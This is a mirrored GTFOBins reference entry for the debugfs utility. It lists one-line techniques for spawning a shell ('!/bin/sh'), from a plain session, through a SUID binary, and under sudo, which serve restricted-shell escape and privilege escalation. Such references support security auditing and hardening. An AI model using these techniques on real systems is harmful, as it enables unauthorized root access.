1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/debugfs.md

16 lines
192 B
Markdown
Raw Permalink Normal View History

---
functions:
shell:
- code: |
debugfs
!/bin/sh
suid:
- code: |
./debugfs
!/bin/sh
sudo:
- code: |
sudo debugfs
!/bin/sh
---